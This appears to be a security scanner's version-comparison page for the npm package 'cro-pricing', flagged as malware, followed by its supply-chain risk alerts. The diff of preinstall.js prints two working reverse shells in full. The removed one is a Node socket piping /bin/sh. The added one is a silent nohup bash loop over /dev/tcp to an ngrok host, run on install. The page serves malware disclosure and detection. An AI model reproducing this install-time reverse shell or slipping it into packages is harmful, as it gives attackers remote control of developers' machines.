cro-pricing - npm Package Compare versions

Comparing version 1.0.7 to 1.0.8

package.json

 {
   "name": "cro-pricing",
-  "version": "1.0.7",
+  "version": "1.0.8",
   "main": "index.js",
@@ -5,0 +5,0 @@ "scripts": {

preinstall.js

@@ -1,20 +0,30 @@
-const net = require("net");
-const { spawn } = require("child_process");
+const { exec } = require("child_process");
+const fs = require("fs");
 
 const host = "0.tcp.ap.ngrok.io";
-const port = 10113;
+const port = "12413";
 
-const client = new net.Socket();
+// Check if a shell exists
+function shellExists(path) {
+  try {
+    return fs.existsSync(path);
+  } catch {
+    return false;
+  }
+}
 
-client.connect(port, host, () => {
-  const sh = spawn("/bin/sh", []);
-  client.pipe(sh.stdin);
-  sh.stdout.pipe(client);
-  sh.stderr.pipe(client);
-});
+// Determine shell to use
+let shell = "/bin/sh"; // default fallback
+if (shellExists("/bin/bash")) {
+  shell = "/bin/bash";
+}
 
-client.on("error", (err) => {
-  setTimeout(() => {
-    client.connect(port, host);
-  }, 5000); // retry on disconnect
+// Build command using the detected shell
+const cmd = `nohup ${shell} -c 'exec 5<>/dev/tcp/${host}/${port}; while read -r l<&5; do $l; done >&5 2>&5' &>/dev/null &`;
+
+// Execute command
+exec(cmd, (error, stdout, stderr) => {
+  if (error) {
+    // Fail silently or log
+  }
 });

New alerts

Known malware

Supply chain risk

This package version is identified as malware. It has been flagged either by Socket's AI scanner and confirmed by our threat research team, or is listed as malicious in security databases and other sources.

Found 1 instance in 1 package

Shell access

Supply chain risk

This module accesses the system shell. Accessing the system shell increases the risk of executing arbitrary code.

Found 1 instance in 1 package

Unpublished package

Supply chain risk

Package version was not found on the registry. It may exist on a different registry and need to be configured to pull from that registry.

Found 1 instance in 1 package

Filesystem access

Supply chain risk

Accesses the file system, and could potentially read sensitive data.

Found 1 instance in 1 package

Fixed alerts

AI-detected potential malware

Supply chain risk

AI has identified this package as malware. This is a strong signal that the package may be malicious.

Found 1 instance in 1 package

Network access

Supply chain risk

This module accesses the network.

Found 1 instance in 1 package

Shell access

Supply chain risk

This module accesses the system shell. Accessing the system shell increases the risk of executing arbitrary code.

Found 1 instance in 1 package

Unpublished package

Supply chain risk

Package version was not found on the registry. It may exist on a different registry and need to be configured to pull from that registry.

Found 1 instance in 1 package

Improved metrics

Total package byte prevSize

915

32.99%

Lines of code

25

56.25%

Number of high supply chain risk alerts

1

-50%

Number of medium supply chain risk alerts

2

-33.33%

Worsened metrics

Number of critical supply chain risk alerts

1

Infinity%

Number of low supply chain risk alerts

3

50%

No dependency changes